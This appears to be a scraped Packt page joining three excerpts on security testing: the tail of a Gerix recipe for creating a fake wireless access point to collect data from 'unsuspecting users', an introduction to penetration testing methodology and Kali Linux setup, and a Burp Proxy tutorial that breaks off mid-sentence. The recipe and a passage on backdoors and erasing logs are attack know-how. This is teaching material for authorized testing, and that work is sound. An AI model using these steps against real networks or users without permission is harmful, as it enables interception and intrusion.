for AirCrack. Getting ready A supported wireless card configured for packet injection will be required to complete this recipe. In the case of a wireless card, packet injection involves sending a packet, or injecting it onto an already established connection between two parties. How to do it... Let's begin the process of creating a fake AP with Gerix. Let's navigate to the directory where Gerix is located: cd /usr/share/gerix-wifi-cracker To begin using Gerix, we issue the following command: python gerix.py Click on the Configuration tab. On the Configuration tab, select your wireless interface. Click on the Enable/Disable Monitor Mode button. Once Monitor mode has been enabled successfully, under Select Target Network, press the Rescan Networks button. The list of targeted networks will begin to fill. Select a wireless network to target. In this case, we select a WEP encrypted network. Click on the Fake AP tab. Change the Access Point ESSID from honeypot to something less suspicious. In this case, we are going to use personalnetwork. We will use the defaults on each of the other options. To start the fake access point,click on the Start Face Access Point button. That's it! How it works... In this recipe, we used Gerix to create a fake AP. Creating a fake AP is an excellent way of collecting information from unsuspecting users. The reason fake access points are a great tool to use is that to your victim, they appear to be a legitimate access point, thus making it trusted by the user. Using Gerix, we were able to automate the creation of setting up a fake access point in a few short clicks.
Read more
  • 0
  • 0
  • 15181
article-image-penetration-testing-and-setup
Packt
27 Sep 2013
35 min read
Save for later

Penetration Testing and Setup

Packt
27 Sep 2013
35 min read
(For more resources related to this topic, see here.) Penetration Testing goes beyond an assessment by evaluating identified vulnerabilities to verify if the vulnerability is real or a false positive. For example, an audit or an assessment may utilize scanning tools that provide a few hundred possible vulnerabilities on multiple systems. A Penetration Test would attempt to attack those vulnerabilities in the same manner as a malicious hacker to verify which vulnerabilities are genuine reducing the real list of system vulnerabilities to a handful of security weaknesses. The most effective Penetration Tests are the ones that target a very specific system with a very specific goal. Quality over quantity is the true test of a successful Penetration Test. Enumerating a single system during a targeted attack reveals more about system security and response time to handle incidents than wide spectrum attack. By carefully choosing valuable targets, a Penetration Tester can determine the entire security infrastructure and associated risk for a valuable asset. This is a common misinterpretation and should be clearly explained to all potential customers. Penetration Testing evaluates the effectiveness of existing security. If a customer does not have strong security then they will receive little value from Penetration Testing services. As a consultant, it is recommended that Penetration Testing services are offered as a means to verify security for existing systems once a customer believes they have exhausted all efforts to secure those systems and are ready to evaluate if there are any existing gaps in securing those systems. Positioning a proper scope of work is critical when selling Penetration Testing services. The scope of work defines what systems and applications are being targeted as well as what toolsets may be used to compromise vulnerabilities that are found. Best practice is working with your customer during a design session to develop an acceptable scope of work that doesn't impact the value of the results. Web Penetration Testing with Kali Linux—the next generation of BackTrack —is a hands-on guide that will provide you step-by-step methods for finding vulnerabilities and exploiting web applications. This article will cover researching targets, identifying and exploiting vulnerabilities in web applications as well as clients using web application services, defending web applications against common attacks, and building Penetration Testing deliverables for professional services practice. We believe this article is great for anyone who is interested in learning how to become a Penetration Tester, users who are new to Kali Linux and want to learn the features and differences in Kali versus BackTrack, and seasoned Penetration Testers who may need a refresher or reference on new tools and techniques. This article will break down the fundamental concepts behind various security services as well as guidelines for building a professional Penetration Testing practice. Concepts include differentiating a Penetration Test from other services, methodology overview, and targeting web applications. This article also provides a brief overview of setting up a Kali Linux testing or real environment. Web application Penetration Testing concepts A web application is any application that uses a web browser as a client. This can be a simple message board or a very complex spreadsheet. Web applications are popular based on ease of access to services and centralized management of a system used by multiple parties. Requirements for accessing a web application can follow industry web browser client standards simplifying expectations from both the service providers as well as the hosts accessing the application. Web applications are the most widely used type of applications within any organization. They are the standard for most Internet-based applications. If you look at smartphones and tablets, you will find that most applications on these devices are also web applications. This has created a new and large target-rich surface for security professionals as well as attackers exploiting those systems. Penetration Testing web applications can vary in scope since there is a vast number of system types and business use cases for web application services. The core web application tiers which are hosting servers, accessing devices, and data depository should be tested along with communication between the tiers during a web application Penetration Testing exercise. An example for developing a scope for a web application Penetration Test is testing a Linux server hosting applications for mobile devices. The scope of work at a minimum should include evaluating the Linux server (operating system, network configuration, and so on), applications hosted from the server, how systems and users authenticate, client devices accessing the server and communication between all three tiers. Additional areas of evaluation that could be included in the scope of work are how devices are obtained by employees, how devices are used outside of accessing the application, the surrounding network(s), maintenance of the systems, and the users of the systems. Some examples of why these other areas of scope matter are having the Linux server compromised by permitting connection from a mobile device infected by other means or obtaining an authorized mobile device through social media to capture confidential information. Some deliverable examples in this article offer checkbox surveys that can assist with walking a customer through possible targets for a web application Penetration Testing scope of work. Every scope of work should be customized around your customer's business objectives, expected timeframe of performance, allocated funds, and desired outcome. As stated before, templates serve as tools to enhance a design session for developing a scope of work. Penetration Testing methodology There are logical steps recommended for performing a Penetration Test. The first step is identifying the project's starting status. The most common terminology defining the starting state is Black box testing, White box testing, or a blend between White and Black box testing known as Gray box testing. Black box assumes the Penetration Tester has no prior knowledge of the target network, company processes, or services it provides. Starting a Black box project requires a lot of reconnaissance and, typically, is a longer engagement based on the concept that real-world attackers can spend long durations of time studying targets before launching attacks. As a security professional, we find Black box testing presents some problems when scoping a Penetration Test. Depending on the system and your familiarity with the environment, it can be difficult to estimate how long the reconnaissance phase will last. This usually presents a billing problem. Customers, in most cases, are not willing to write a blank cheque for you to spend unlimited time and resources on the reconnaissance phase; however, if you do not spend the time needed then your Penetration Test is over before it began. It is also unrealistic because a motivated attacker will not necessarily have the same scoping and billing restrictions as a professional Penetration Tester. That is why we recommend Gray box over Black box testing. White box is when a Penetration Tester has intimate knowledge about the system. The goals of the Penetration Test are clearly defined and the outcome of the report from the test is usually expected. The tester has been provided with details on the target such as network information, type of systems, company processes, and services. White box testing typically is focused on a particular business objective such as meeting a compliance need, rather than generic assessment, and could be a shorter engagement depending on how the target space is limited. White box assignments could reduce information gathering efforts, such as reconnaissance services, equaling less cost for Penetration Testing services. Gray box testing falls in between Black and White box testing. It is when the client or system owner agrees that some unknown information will eventually be discovered during a Reconnaissance phase, but allows the Penetration Tester to skip this part. The Penetration Tester is provided some basic details of the target; however, internal workings and some other privileged information is still kept from the Penetration Tester. Real attackers tend to have some information about a target prior to engaging the target. Most attackers (with the exception of script kiddies or individuals downloading tools and running them) do not choose random targets. They are motivated and have usually interacted in some way with their target before attempting an attack. Gray box is an attractive choice approach for many security professionals conducting Penetration Tests because it mimics real-world approaches used by attackers and focuses on vulnerabilities rather than reconnaissance. The scope of work defines how penetration services will be started and executed. Kicking off a Penetration Testing service engagement should include an information gathering session used to document the target environment and define the boundaries of the assignment to avoid unnecessary reconnaissance services or attacking systems that are out of scope. A well-defined scope of work will save a service provider from scope creep (defined as uncontrolled changes or continuous growth in a project's scope), operate within the expected timeframe and help provide more accurate deliverable upon concluding services. Real attackers do not have boundaries such as time, funding, ethics, or tools meaning that limiting a Penetration Testing scope may not represent a real-world scenario. In contrast to a limited scope, having an unlimited scope may never evaluate critical vulnerabilities if a Penetration Test is concluded prior to attacking desired systems. For example, a Penetration Tester may capture user credentials to critical systems and conclude with accessing those systems without testing how vulnerable those systems are to network-based attacks. It's also important to include who is aware of the Penetration Test as a part of the scope. Real attackers may strike at anytime and probably when people are least expecting it. Some fundamentals for developing a scope of work for a Penetration Test are as follows: Definition of Target System(s): This specifies what systems should be tested. This includes the location on the network, types of systems, and business use of those systems. Timeframe of Work Performed: When the testing should start and what is the timeframe provided to meet specified goals. Best practice is NOT to limit the time scope to business hours. How Targets Are Evaluated: What types of testing methods such as scanning or exploitation are and not permitted? What is the risk associated with permitted specific testing methods? What is the impact of targets that become inoperable due to penetration attempts? Examples are; using social networking by pretending to be an employee, denial of service attack on key systems, or executing scripts on vulnerable servers. Some attack methods may pose a higher risk of damaging systems than others. Tools and software: What tools and software are used during the Penetration Test? This is important and a little controversial. Many security professionals believe if they disclose their tools they will be giving away their secret sauce. We believe this is only the case when security professionals used widely available commercial products and are simply rebranding canned reports from these products. Seasoned security professionals will disclose the tools being used, and in some cases when vulnerabilities are exploited, documentation on the commands used within the tools to exploit a vulnerability. This makes the exploit re-creatable, and allows the client to truly understand how the system was compromised and the difficulty associated with the exploit. Notified Parties: Who is aware of the Penetration Test? Are they briefed beforehand and able to prepare? Is reaction to penetration efforts part of the scope being tested? If so, it may make sense not to inform the security operations team prior to the Penetration Test. This is very important when looking at web applications that may be hosted by another party such as a cloud service provider that could be impacted from your services. Initial Access Level: What type of information and access is provided prior to kicking off the Penetration Test? Does the Penetration Tester have access to the server via Internet and/or Intranet? What type of initial account level access is granted? Is this a Black, White, or Gray box assignment for each target? Definition of Target Space: This defines the specific business functions included in the Penetration Test. For example, conducting a Penetration Test on a specific web application used by sales while not touching a different application hosted from the same server. Identification of Critical Operation Areas: Define systems that should not be touched to avoid a negative impact from the Penetration Testing services. Is the active authentication server off limits? It's important to make critical assets clear prior to engaging a target. Definition of the Flag: It is important to define how far a Penetration Test should compromise a system or a process. Should data be removed from the network or should the attacker just obtain a specific level of unauthorized access? Deliverable: What type of final report is expected? What goals does the client specify to be accomplished upon closing a Penetration Testing service agreement? Make sure the goals are not open-ended to avoid scope creep of expected service. Is any of the data classified or designated for a specific group of people? How should the final report be delivered? It is important to deliver a sample report or periodic updates so that there are no surprises in the final report. Remediation expectations: Are vulnerabilities expected to be documented with possible remediation action items? Who should be notified if a system is rendered unusable during a Penetration Testing exercise? What happens if sensitive data is discovered? Most Penetration Testing services do NOT include remediation of problems found. Some service definitions that should be used to define the scope of services are: Security Audit: Evaluating a system or an application's risk level against a set of standards or baselines. Standards are mandatory rules while baselines are the minimal acceptable level of security. Standards and baselines achieve consistency in security implementations and can be specific to industries, technologies, and processes. Most requests for security serves for audits are focused on passing an official audit (for example preparing for a corporate or a government audit) or proving the baseline requirements are met for a mandatory set of regulations (for example following the HIPAA and HITECH mandates for protecting healthcare records). It is important to inform potential customers if your audit services include any level of insurance or protection if an audit isn't successful after your services. It's also critical to document the type of remediation included with audit services (that is, whether you would identify a problem, offer a remediation action plan or fix the problem). Auditing for compliance is much more than running a security tool. It relies heavily on the standard types of reporting and following a methodology that is an accepted standard for the audit. In many cases, security audits give customers a false sense of security depending on what standards or baselines are being audited. Most standards and baselines have a long update process that is unable to keep up with the rapid changes in threats found in today's cyber world. It is HIGHLY recommended to offer security services beyond standards and baselines to raise the level of security to an acceptable level of protection for real-world threats. Services should include following up with customers to assist with remediation along with raising the bar for security beyond any industry standards and baselines. Vulnerability Assessment: This is the process in which network devices, operating systems and application software are scanned in order to identify the presence of known and unknown vulnerabilities. Vulnerability is a gap, error, or weakness in how a system is designed, used, and protected. When a vulnerability is exploited, it can result in giving unauthorized access, escalation of privileges, denial-of-service to the asset, or other outcomes. Vulnerability Assessments typically stop once a vulnerability is found, meaning that the Penetration Tester doesn't execute an attack against the vulnerability to verify if it's genuine. A Vulnerability Assessment deliverable provides potential risk associated with all the vulnerabilities found with possible remediation steps. There are many solutions such as Kali Linux that can be used to scan for vulnerabilities based on system/server type, operating system, ports open for communication and other means. Vulnerability Assessments can be White, Gray, or Black box depending on the nature of the assignment. Vulnerability scans are only useful if they calculate risk. The downside of many security audits is vulnerability scan results that make security audits thicker without providing any real value. Many vulnerability scanners have false positives or identify vulnerabilities that are not really there. They do this because they incorrectly identify the OS or are looking for specific patches to fix vulnerabilities but not looking at rollup patches (patches that contain multiple smaller patches) or software revisions. Assigning risk to vulnerabilities gives a true definition and sense of how vulnerable a system is. In many cases, this means that vulnerability reports by automated tools will need to be checked. Customers will want to know the risk associated with vulnerability and expected cost to reduce any risk found. To provide the value of cost, it's important to understand how to calculate risk. Calculating risk It is important to understand how to calculate risk associated with vulnerabilities found, so that a decision can be made on how to react. Most customers look to the CISSP triangle of CIA when determining the impact of risk. CIA is the confidentiality, integrity, and availability of a particular system or application. When determining the impact of risk, customers must look at each component individually as well as the vulnerability in its entirety to gain a true perspective of the risk and determine the likelihood of impact. It is up to the customer to decide if the risk associated to vulnerability found justifies or outweighs the cost of controls required to reduce the risk to an acceptable level. A customer may not be able to spend a million dollars on remediating a threat that compromises guest printers; however, they will be very willing to spend twice as much on protecting systems with the company's confidential data. The Certified Information Systems Security Professional (CISSP) curriculum lists formulas for calculating risk as follow. A Single Loss Expectancy (SLE) is the cost of a single loss to an Asset Value (AV). Exposure Factor (EF) is the impact the loss of the asset will have to an organization such as loss of revenue due to an Internet-facing server shutting down. Customers should calculate the SLE of an asset when evaluating security investments to help identify the level of funding that should be assigned for controls. If a SLE would cause a million dollars of damage to the company, it would make sense to consider that in the budget. The Single Loss Expectancy formula: SLE = AV * EF The next important formula is identifying how often the SLE could occur. If an SLE worth a million dollars could happen once in a million years, such as a meteor falling out of the sky, it may not be worth investing millions in a protection dome around your headquarters. In contrast, if a fire could cause a million dollars worth of damage and is expected every couple of years, it would be wise to invest in a fire prevention system. The number of times an asset is lost is called the Annual Rate of Occurrence (ARO). The Annualized Loss Expectancy (ALE) is an expression of annual anticipated loss due to risk. For example, a meteor falling has a very low annualized expectancy (once in a million years), while a fire is a lot more likely and should be calculated in future investments for protecting a building. Annualized Loss Expectancy formula: ALE = SLE * ARO The final and important question to answer is the risk associated with an asset used to figure out the investment for controls. This can determine if and how much the customer should invest into remediating vulnerability found in a asset. Risk formula: Risk = Asset Value * Threat * Vulnerability * Impact It is common for customers not to have values for variables in Risk Management formulas. These formulas serve as guidance systems, to help the customer better understand how they should invest in security. In my previous examples, using the formulas with estimated values for a meteor shower and fire in a building, should help explain with estimated dollar value why a fire prevention system is a better investment than metal dome protecting from falling objects. Penetration Testing is the method of attacking system vulnerabilities in a similar way to real malicious attackers. Typically, Penetration Testing services are requested when a system or network has exhausted investments in security and clients are seeking to verify if all avenues of security have been covered. Penetration Testing can be Black, White, or Gray box depending on the scope of work agreed upon. The key difference between a Penetration Test and Vulnerability Assessment is that a Penetration Test will act upon vulnerabilities found and verify if they are real reducing the list of confirmed risk associated with a target. A Vulnerability Assessment of a target could change to a Penetration Test once the asset owner has authorized the service provider to execute attacks against the vulnerabilities identified in a target. Typically, Penetration Testing services have a higher cost associated since the services require more expensive resources, tools, and time to successfully complete assignments. One popular misconception is that a Penetration Testing service enhances IT security since services have a higher cost associated than other security services: Penetration Testing does not make IT networks more secure, since services evaluate existing security! A customer should not consider a Penetration Test if there is a belief the target is not completely secure. Penetration Testing can cause a negative impact to systems: It's critical to have authorization in writing from the proper authorities before starting a Penetration Test of an asset owned by another party. Not having proper authorization could be seen as illegal hacking by authorities. Authorization should include who is liable for any damages caused during a penetration exercise as well as who should be contacted to avoid future negative impacts once a system is damaged. Best practice is alerting the customers of all the potential risks associated with each method used to compromise a target prior to executing the attack to level set expectations. This is also one of the reasons we recommend targeted Penetration Testing with a small scope. It is easier to be much more methodical in your approach. As a common best practice, we receive confirmation, which is a worst case scenario, that a system can be restored by a customer using backups or some other disaster recovery method. Penetration Testing deliverable expectations should be well defined while agreeing on a scope of work. The most common methods by which hackers obtain information about targets is through social engineering via attacking people rather than systems. Examples are interviewing for a position within the organization and walking out a week later with sensitive data offered without resistance. This type of deliverable may not be acceptable if a customer is interested in knowing how vulnerable their web applications are to remote attack. It is also important to have a defined end-goal so that all parties understand when the penetration services are considered concluded. Usually, an agreed-upon deliverable serves this purpose. A Penetration Testing engagement's success for a service provider is based on profitability of time and services used to deliver the Penetration Testing engagement. A more efficient and accurate process means better results for less services used. The higher the quality of the deliverables, the closer the service can meet customer expectation, resulting in a better reputation and more future business. For these reasons, it's important to develop a methodology for executing Penetration Testing services as well as for how to report what is found. Kali Penetration Testing concepts Kali Linux is designed to follow the flow of a Penetration Testing service engagement. Regardless if the starting point is White, Black, or Gray box testing, there is a set of steps that should be followed when Penetration Testing a target with Kali or other tools. Step 1 – Reconnaissance You should learn as much as possible about a target's environment and system traits prior to launching an attack. The more information you can identify about a target, the better chance you have to identify the easiest and fastest path to success. Black box testing requires more reconnaissance than White box testing since data is not provided about the target(s). Reconnaissance services can include researching a target's Internet footprint, monitoring resources, people, and processes, scanning for network information such as IP addresses and systems types, social engineering public services such as help desk and other means. Reconnaissance is the first step of a Penetration Testing service engagement regardless if you are verifying known information or seeking new intelligence on a target. Reconnaissance begins by defining the target environment based on the scope of work. Once the target is identified, research is performed to gather intelligence on the target such as what ports are used for communication, where it is hosted, the type of services being offered to clients, and so on. This data will develop a plan of action regarding the easiest methods to obtain desired results. The deliverable of a reconnaissance assignment should include a list of all the assets being targeted, what applications are associated with the assets, services used, and possible asset owners. Kali Linux offers a category labeled Information Gathering that serves as a Reconnaissance resource. Tools include methods to research network, data center, wireless, and host systems. The following is the list of Reconnaissance goals: Identify target(s) Define applications and business use Identify system types Identify available ports Identify running services Passively social engineer information Document findings Step 2 – Target evaluation Once a target is identified and researched from Reconnaissance efforts, the next step is evaluating the target for vulnerabilities. At this point, the Penetration Tester should know enough about a target to select how to analyze for possible vulnerabilities or weakness. Examples for testing for weakness in how the web application operates, identified services, communication ports, or other means. Vulnerability Assessments and Security Audits typically conclude after this phase of the target evaluation process. Capturing detailed information through Reconnaissance improves accuracy of targeting possible vulnerabilities, shortens execution time to perform target evaluation services, and helps to avoid existing security. For example, running a generic vulnerability scanner against a web application server would probably alert the asset owner, take a while to execute and only generate generic details about the system and applications. Scanning a server for a specific vulnerability based on data obtained from Reconnaissance would be harder for the asset owner to detect, provide a good possible vulnerability to exploit, and take seconds to execute. Evaluating targets for vulnerabilities could be manual or automated through tools. There is a range of tools offered in Kali Linux grouped as a category labeled Vulnerability Analysis. Tools range from assessing network devices to databases. The following is the list of Target Evaluation goals: Evaluation targets for weakness Identify and prioritize vulnerable systems Map vulnerable systems to asset owners Document findings Step 3 – Exploitation This step exploits vulnerabilities found to verify if the vulnerabilities are real and what possible information or access can be obtained. Exploitation separates Penetration Testing services from passive services such as Vulnerability Assessments and Audits. Exploitation and all the following steps have legal ramifications without authorization from the asset owners of the target. The success of this step is heavily dependent on previous efforts. Most exploits are developed for specific vulnerabilities and can cause undesired consequences if executed incorrectly. Best practice is identifying a handful of vulnerabilities and developing an attack strategy based on leading with the most vulnerable first. Exploiting targets can be manual or automated depending on the end objective. Some examples are running SQL Injections to gain admin access to a web application or social engineering a Helpdesk person into providing admin login credentials. Kali Linux offers a dedicated catalog of tools titled Exploitation Tools for exploiting targets that range from exploiting specific services to social engineering packages. The following is the list of Exploitation goals: Exploit vulnerabilities Obtain foothold Capture unauthorized data Aggressively social engineer Attack other systems or applications Document findings Step 4 – Privilege Escalation Having access to a target does not guarantee accomplishing the goal of a penetration assignment. In many cases, exploiting a vulnerable system may only give limited access to a target's data and resources. The attacker must escalate privileges granted to gain the access required to capture the flag, which could be sensitive data, critical infrastructure, and so on. Privilege Escalation can include identifying and cracking passwords, user accounts, and unauthorized IT space. An example is achieving limited user access, identifying a shadow file containing administration login credentials, obtaining an administrator password through password cracking, and accessing internal application systems with administrator access rights. Kali Linux includes a number of tools that can help gain Privilege Escalation through the Password Attacks and Exploitation Tools catalog. Since most of these tools include methods to obtain initial access and Privilege Escalation, they are gathered and grouped according to their toolsets. The following is a list of Privilege Escalation goals: Obtain escalated level access to system(s) and network(s) Uncover other user account information Access other systems with escalated privileges Document findings Step 5 – maintaining a foothold The final step is maintaining access by establishing other entry points into the target and, if possible, covering evidence of the penetration. It is possible that penetration efforts will trigger defenses that will eventually secure how the Penetration Tester obtained access to the network. Best practice is establishing other means to access the target as insurance against the primary path being closed. Alternative access methods could be backdoors, new administration accounts, encrypted tunnels, and new network access channels. The other important aspect of maintaining a foothold in a target is removing evidence of the penetration. This will make it harder to detect the attack thus reducing the reaction by security defenses. Removing evidence includes erasing user logs, masking existing access channels, and removing the traces of tampering such as error messages caused by penetration efforts. Kali Linux includes a catalog titled Maintaining Access focused on keeping a foothold within a target. Tools are used for establishing various forms of backdoors into a target. The following is a list of goals for maintaining a foothold: Establish multiple access methods to target network Remove evidence of authorized access Repair systems impacting by exploitation Inject false data if needed Hide communication methods through encryption and other means Document findings Introducing Kali Linux The creators of BackTrack have released a new, advanced Penetration Testing Linux distribution named Kali Linux. BackTrack 5 was the last major version of the BackTrack distribution. The creators of BackTrack decided that to move forward with the challenges of cyber security and modern testing a new foundation was needed. Kali Linux was born and released on March 13th, 2013. Kali Linux is based on Debian and an FHS-compliant filesystem. Kali has many advantages over BackTrack. It comes with many more updated tools. The tools are streamlined with the Debian repositories and synchronized four times a day. That means users have the latest package updates and security fixes. The new compliant filesystems translate into running most tools from anywhere on the system. Kali has also made customization, unattended installation, and flexible desktop environments strong features in Kali Linux. Kali Linux is available for download at http://www.kali.org/. Kali system setup Kali Linux can be downloaded in a few different ways. One of the most popular ways to get Kali Linux is to download the ISO image. The ISO image is available in 32-bit and 64-bit images. If you plan on using Kali Linux on a virtual machine such as VMware, there is a VM image prebuilt. The advantage of downloading the VM image is that it comes preloaded with VMware tools. The VM image is a 32-bit image with Physical Address Extension support, or better known as PAE. In theory, a PAE kernel allows the system to access more system memory than a traditional 32-bit operating system. There have been some well-known personalities in the world of operating systems that have argued for and against the usefulness of a PAE kernel. However, the authors of this article suggest using the VM image of Kali Linux if you plan on using it in a virtual environment. Running Kali Linux from external media Kali Linux can be run without installing software on a host hard drive by accessing it from an external media source such as a USB drive or DVD. This method is simple to enable; however, it has performance and operational implementations. Kali Linux having to load programs from a remote source would impact performance and some applications or hardware settings may not operate properly. Using read-only storage media does not permit saving custom settings that may be required to make Kali Linux operate correctly. It's highly recommended to install Kali Linux on a host hard drive. Installing Kali Linux Installing Kali Linux on your computer is straightforward and similar to installing other operating systems. First, you'll need compatible computer hardware. Kali is supported on i386, amd64, and ARM (both armel and armhf) platforms. The hardware requirements are shown in the following list, although we suggest exceeding the minimum amount by at least three times. Kali Linux, in general, will perform better if it has access to more RAM and is installed on newer machines. Download Kali Linux and either burn the ISO to DVD, or prepare a USB stick with Kali Linux Live as the installation medium. If you do not have a DVD drive or a USB port on your computer, check out the Kali Linux Network Install. The following is a list of minimum installation requirements: A minimum of 8 GB disk space for installing Kali Linux. For i386 and amd64 architectures, a minimum of 512MB RAM. CD-DVD Drive / USB boot support. You will also need an active Internet connection before installation. This is very important or you will not be able to configure and access repositories during installation. When you start Kali you will be presented with a Boot Install screen. You may choose what type of installation (GUI-based or text-based) you would like to perform. Select the local language preference, country, and keyboard preferences. Select a hostname for the Kali Linux host. The default hostname is Kali. Select a password. Simple passwords may not work so chose something that has some degree of complexity. The next prompt asks for your timezone. Modify accordingly and select Continue. The next screenshot shows selecting Eastern standard time. The installer will ask to set up your partitions. If you are installing Kali on a virtual image, select Guided Install – Whole Disk. This will destroy all data on the disk and install Kali Linux. Keep in mind that on a virtual machine, only the virtual disk is getting destroyed. Advanced users can select manual configurations to customize partitions. Kali also offers the option of using LVM, logical volume manager. LVM allows you to manage and resize partitions after installation. In theory, it is supposed to allow flexibility when storage needs change from initial installation. However, unless your Kali Linux needs are extremely complex, you most likely will not need to use it. The last window displays a review of the installation settings. If everything looks correct, select Yes to continue the process as shown in the following screenshot: Kali Linux uses central repositories to distribute application packages. If you would like to install these packages, you need to use a network mirror. The packages are downloaded via HTTP protocol. If your network uses a proxy server, you will also need to configure the proxy settings for you network. Kali will prompt to install GRUB. GRUB is a multi-bootloader that gives the user the ability to pick and boot up to multiple operating systems. In almost all cases, you should select to install GRUB. If you are configuring your system to dual boot, you will want to make sure GRUB recognizes the other operating systems in order for it to give users the options to boot into an alternative operating system. If it does not detect any other operating systems, the machine will automatically boot into Kali Linux. Congratulations! You have finished installing Kali Linux. You will want to remove all media (physical or virtual) and select Continue to reboot your system. Kali Linux and VM image first run On some Kali installation methods, you will be asked to set the root's password. When Kali Linux boots up, enter the root's username and the password you selected. If you downloaded a VM image of Kali, you will need the root password. The default username is root and password is toor. Kali toolset overview Kali Linux offers a number of customized tools designed for Penetration Testing. Tools are categorized in the following groups as seen in the drop-down menu shown in the following screenshot: Information Gathering: These are Reconnaissance tools used to gather data on your target network and devices. Tools range from identifying devices to protocols used. Vulnerability Analysis: Tools from this section focus on evaluating systems for vulnerabilities. Typically, these are run against systems found using the Information Gathering Reconnaissance tools. Web Applications: These are tools used to audit and exploit vulnerabilities in web servers. Many of the audit tools we will refer to in this article come directly from this category. However web applications do not always refer to attacks against web servers, they can simply be web-based tools for networking services. For example, web proxies will be found under this section. Password Attacks: This section of tools primarily deals with brute force or the offline computation of passwords or shared keys used for authentication. Wireless Attacks: These are tools used to exploit vulnerabilities found in wireless protocols. 802.11 tools will be found here, including tools such as aircrack, airmon, and wireless password cracking tools. In addition, this section has tools related to RFID and Bluetooth vulnerabilities as well. In many cases, the tools in this section will need to be used with a wireless adapter that can be configured by Kali to be put in promiscuous mode. Exploitation Tools: These are tools used to exploit vulnerabilities found in systems. Usually, a vulnerability is identified during a Vulnerability Assessment of a target. Sniffing and Spoofing: These are tools used for network packet captures, network packet manipulators, packet crafting applications, and web spoofing. There are also a few VoIP reconstruction applications. Maintaining Access: Maintaining Access tools are used once a foothold is established into a target system or network. It is common to find compromised systems having multiple hooks back to the attacker to provide alternative routes in the event a vulnerability that is used by the attacker is found and remediated. Reverse Engineering: These tools are used to disable an executable and debug programs. The purpose of reverse engineering is analyzing how a program was developed so it can be copied, modified, or lead to development of other programs. Reverse Engineering is also used for malware analysis to determine what an executable does or by researchers to attempt to find vulnerabilities in software applications. Stress Testing: Stress Testing tools are used to evaluate how much data a system can handle. Undesired outcomes could be obtained from overloading systems such as causing a device controlling network communication to open all communication channels or a system shutting down (also known as a denial of service attack). Hardware Hacking: This section contains Android tools, which could be classified as mobile, and Ardunio tools that are used for programming and controlling other small electronic devices. Forensics: Forensics tools are used to monitor and analyze computer network traffic and applications. Reporting Tools: Reporting tools are methods to deliver information found during a penetration exercise. System Services: This is where you can enable and disable Kali services. Services are grouped into BeEF, Dradis, HTTP, Metasploit, MySQL, and SSH. Summary This article served as an introduction to Penetration Testing Web Applications and an overview of setting up Kali Linux. We started off defining best practices for performing Penetration Testing services including defining risk and differences between various services. The key takeaway is to understand what makes a Penetration Test different from other security services, how to properly scope a level of service and best method to perform services. Positioning the right expectations upfront with a potential client will better qualify the opportunity and simplify developing an acceptable scope of work. This article continued with providing an overview of Kali Linux. Topics included how to download your desired version of Kali Linux, ways to perform the installation, and brief overview of toolsets available. The next article will cover how to perform Reconnaissance on a target. This is the first and most critical step in delivering Penetration Testing services. Resources for Article: Further resources on this subject: BackTrack 4: Security with Penetration Testing Methodology [Article] CISSP: Vulnerability and Penetration Testing for Access Control [Article] Making a Complete yet Small Linux Distribution [Article]
Read more
  • 0
  • 0
  • 3308

Packt
03 Sep 2013
11 min read
Save for later

Quick start – Using Burp Proxy

Packt
03 Sep 2013
11 min read
(For more resources related to this topic, see here.) At the top of Burp Proxy, you will notice the following three tabs: intercept: HTTP requests and responses that are in transit can be inspected and modified from this window options: Proxy configurations and advanced preferences can be tuned from this window history: All intercepted traffic can be quickly analyzed from this window If you are not familiar with the HTTP protocol or you want to refresh your knowledge, HTTP Made Really Easy, A Practical Guide to Writing Clients and Servers, found at http://www.jmarshall.com/easy/http/, represents a compact reference. Step 1 – Intercepting web requests After firing up Burp and configuring the browser, let's intercept our first HTTP request. During this exercise, we will intercept a simple request to the publisher's website: In the intercept tab, make sure that Burp Proxy is properly stopping all requests in transit by checking the intercept button. This should be marked as intercept is on. In the browser, type http://www.packtpub.com/ in the URL bar and press Enter. Back in Burp Proxy, you should be able to see the HTTP request made by the browser. At this stage, the request is temporarily stopped in Burp Proxy waiting for the user to either forward or stop it. For instance, press forward and return to the browser. You should see the home page of Packt Publishing as you would normally interact with the website. Again, type http://www.packtpub.com/ in the URL bar and press Enter. Let's press drop this time. Back in the browser, the page will contain the warning Burp proxy error: message was dropped by user. We have dropped the request, thus Burp Proxy did not forward the request to the server. As a result, the browser received a temporary HTML page with the warning message generated by Burp, instead of the original HTML content. Let's try one more time. Type http://www.packtpub.com/ in the URL bar of the browser and press Enter. Once the request is properly captured by Burp Proxy, the action button becomes active. Click on it to display the contextual menu. This is an important functionality as it allows you to import the current web request in any of the other Burp tools. You can already imagine the potentialities of having a set of integrated tools that allow you to manipulate and analyze web requests so easily. For example, if we want to decode the request, we can simply click on send to decoder. Burp Proxy In Burp Proxy, we can also decide to automatically forward all requests without waiting for the user to either forward or drop the communication. By clicking on the intercept button, it is possible to switch from intercept is on to intercept is off. Nevertheless, the proxy will record all requests in transit. Also, Burp Proxy allows you to automatically intercept all responses matching specific characteristics. Take a look at the numerous options available in the intercept server response section from within the Burp Proxy options tab. For example, it is possible to intercept the server's response only if the client's request was intercepted. This is extremely helpful while testing input validation vulnerabilities as we are generally interested in evaluating the server's responses for all tampered requests. Or else, you may only want to intercept and inspect responses having a specific return code (for example, 200 OK). Step 2 – Inspecting web requests Once a request is properly intercepted, it is possible to inspect the entire content, headers, and parameters, using one of the four Burp Proxy message analysis tabs: raw: This view allows you to display the web request in raw format within a simple text editor. This is a very handy visualization as it enables maximum flexibility for further changing the content. params: In this view, the focus is on user-supplied parameters (GET/POST parameters, cookies). This is particularly important in case of complex requests as it allows to consider all entry points for potential vulnerabilities. Whenever applicable, Burp Proxy will also automatically perform URL decoding. In addition, Burp Proxy will attempt to parse commonly used formats, including JSON. headers: Similarly, this view displays the HTTP header names and values in tabular form. hex: In case of binary content, it is useful to inspect the hexadecimal representation of the resource. This view allows to display a request as in a traditional hex editor. The history tab enables you to analyze all web requests transited through the proxy: Click on the history tab. At the top, Burp Proxy shows all the requests in the bundle. At the bottom, it displays the content of the request and response corresponding to the specific selection. If you have previously modified the request, Burp Proxy history will also display the modified version. Displaying HTTP requests and responses intercepted by Burp Proxy By double-clicking on one of the requests, Burp will automatically open a new window with the specific content. From this window, it is possible to browse all the captured communication using the previous and next buttons Back in the history tab, Burp Proxy displays several details for each item including the request method, URL, response's code, and length. Each request is uniquely identified by a number, visible in the left-hand side column. Click on the request identifier. Burp Proxy allows you to set a color for that specific item. This is extremely helpful to highlight important requests or responses. For example, during the initial application enumeration, you may notice an interesting request; you can mark it and get back later for further testing. Burp Proxy history is also useful when you have to evaluate a sequence of requests in order to reproduce a specific application behavior. Click on the 